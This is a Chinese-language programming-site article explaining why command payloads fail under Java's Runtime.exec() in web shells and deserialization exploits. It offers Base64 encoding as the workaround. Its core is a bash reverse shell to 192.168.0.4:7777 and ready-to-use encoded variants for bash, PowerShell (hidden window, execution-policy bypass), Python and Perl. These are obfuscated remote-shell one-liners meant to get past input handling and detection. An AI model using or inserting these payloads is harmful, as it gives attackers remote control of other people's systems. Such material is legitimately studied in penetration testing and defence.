脚本之家 服务器常用软件
快捷导航
您的位置:首页软件编程java → java.lang.Runtime.exec() Payload

java.lang.Runtime.exec() Payload知识点详解

 更新时间:2020年03月11日 14:15:00   作者:御用闲人  
在本篇文章里小编给大家整理的是一篇关于java.lang.Runtime.exec() Payload知识点相关内容,有兴趣的朋友们学习下。

有时,通过Runtime.getRuntime().exec()执行命令的有效负载有时会失败。使用Web Shell,反序列化利用或通过其他媒介时,可能会发生这种情况。

有时这是因为重定向和管道字符的使用在启动过程的上下文中没有意义。例如,在shell中执行ls> dir_listing会将当前目录的列表输出到名为dir_listing的文件中。但是在exec()函数的上下文中,该命令将被解释为获取>和dir_listing目录的列表。

有时,StringTokenizer类会破坏其中包含空格的参数,该类将命令字符串按空格分隔。像ls“我的目录”之类的东西将被解释为ls“我的目录”。

借助Base64编码,下面的转换器可以帮助减少这些问题。它可以通过调用Bash或PowerShell来制作管道并重新定向,还可以确保参数内没有空格。

样例:

原文

bash -i >& /dev/tcp/192.168.0.4/7777 0>&1

编码后:

bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjAuNC83Nzc3IDA+JjE=}|{base64,-d}|{bash,-i}
#bash

powershell.exe -NonI -W Hidden -NoP -Exec Bypass -Enc YgBhAHMAaAAgAC0AaQAgAD4AJgAgAC8AZABlAHYALwB0AGMAcAAvADEAOQAyAC4AMQA2ADgALgAwAC4ANAAvADcANwA3ADcAIAAwAD4AJgAxAA==
#powershell

python -c exec('YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjAuNC83Nzc3IDA+JjE='.decode('base64'))
#python

perl -MMIME::Base64 -e eval(decode_base64('YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjAuNC83Nzc3IDA+JjE='))
#perl

中间的字符均为“base64”编码。

知识点扩展:

java.lang.Runtime.getRuntime().exec(cmd)命令中参数不能用空格怎么办?

项目中无法执行c程序,猜测是exec()函数的问题

String cmd= exe_path + " " +video + " " +host + ":" + port;
Process process = runtime.exec(cmd);

到此这篇关于java.lang.Runtime.exec() Payload知识点详解的文章就介绍到这了,更多相关java.lang.Runtime.exec() Payload内容请搜索脚本之家以前的文章或继续浏览下面的相关文章希望大家以后多多支持脚本之家!

您可能感兴趣的文章:

相关文章

  • SpringBoot整合阿里云OSS对象存储服务实现文件上传

    SpringBoot整合阿里云OSS对象存储服务实现文件上传

    这篇文章主要介绍了SpringBoot整合阿里云OSS对象存储实现文件上传,帮助大家更好的理解和学习使用SpringBoot,感兴趣的朋友可以了解下
    2021-04-04
  • Seata分布式事务出现ABA问题解决

    Seata分布式事务出现ABA问题解决

    这篇文章主要为大家介绍了Seata分布式事务出现ABA问题解决方法示例,有需要的朋友可以借鉴参考下,希望能够有所帮助,祝大家多多进步,早日升职加薪
    2022-11-11
  • SpringBoot 自定义注解实现涉密字段脱敏

    SpringBoot 自定义注解实现涉密字段脱敏

    关于数据脱敏,网上的文章都是硬编码规则,比如对身份证,手机号,邮件地址等固定写法脱敏。本文在此基础上,拓展动态从数据库查出涉密关键字执行脱敏操作。感兴趣的同学可以参考阅读
    2023-03-03
  • SpringMVC之异常处理解读

    SpringMVC之异常处理解读

    这篇文章主要介绍了SpringMVC之异常处理解读,具有很好的参考价值,希望对大家有所帮助。如有错误或未考虑完全的地方,望不吝赐教
    2023-03-03
  • springboot 同时启用http/https的配置方法

    springboot 同时启用http/https的配置方法

    本文给大家分享springboot 同时启用http/https的配置方法,通过修改配置文件、增加java配置的方法来实现此操作,具体内容详情跟随小编通过本文学习下吧
    2021-05-05
  • Spring Cloud Sleuth 和 Zipkin 进行分布式跟踪使用小结

    Spring Cloud Sleuth 和 Zipkin 进行分布式跟踪使用小结

    分布式跟踪是一种机制,我们可以使用它跟踪整个分布式系统中的特定请求,分布式跟踪允许您跟踪分布式系统中的请求,本文给大家介绍Spring Cloud Sleuth 和 Zipkin 进行分布式跟踪使用小结,感兴趣的朋友一起看看吧
    2022-03-03
  • Mybatis调用Oracle存储过程的方法图文详解

    Mybatis调用Oracle存储过程的方法图文详解

    这篇文章主要介绍了Mybatis调用Oracle存储过程的方法介绍,需要的朋友可以参考下
    2017-09-09
  • gRPC与SpringBoot整合思路和步骤

    gRPC与SpringBoot整合思路和步骤

    在现代微服务架构中,gRPC已经成为了非常受欢迎的通信协议,与SpringBoot整合,它为开发者提供了简洁、高效构建分布式应用,在整合gRPC与SpringBoot时,将gRPC的服务端和客户端分别封装到SpringBoot的应用中,感兴趣的朋友一起看看吧
    2023-08-08
  • MyBatis-Plus动态返回实体类示例详解

    MyBatis-Plus动态返回实体类示例详解

    这篇文章主要为大家介绍了MyBatis-Plus动态返回实体类示例详解,有需要的朋友可以借鉴参考下,希望能够有所帮助,祝大家多多进步,早日升职加薪
    2022-07-07
  • Java设计模式常用的七大原则总结

    Java设计模式常用的七大原则总结

    今天给大家总结了Java设计模式的七大原则,主要有单一职责原则,接口隔离原则,依赖倒转原则,里氏替换原则等,文中有非常详细的介绍,需要的朋友可以参考下
    2021-06-06

最新评论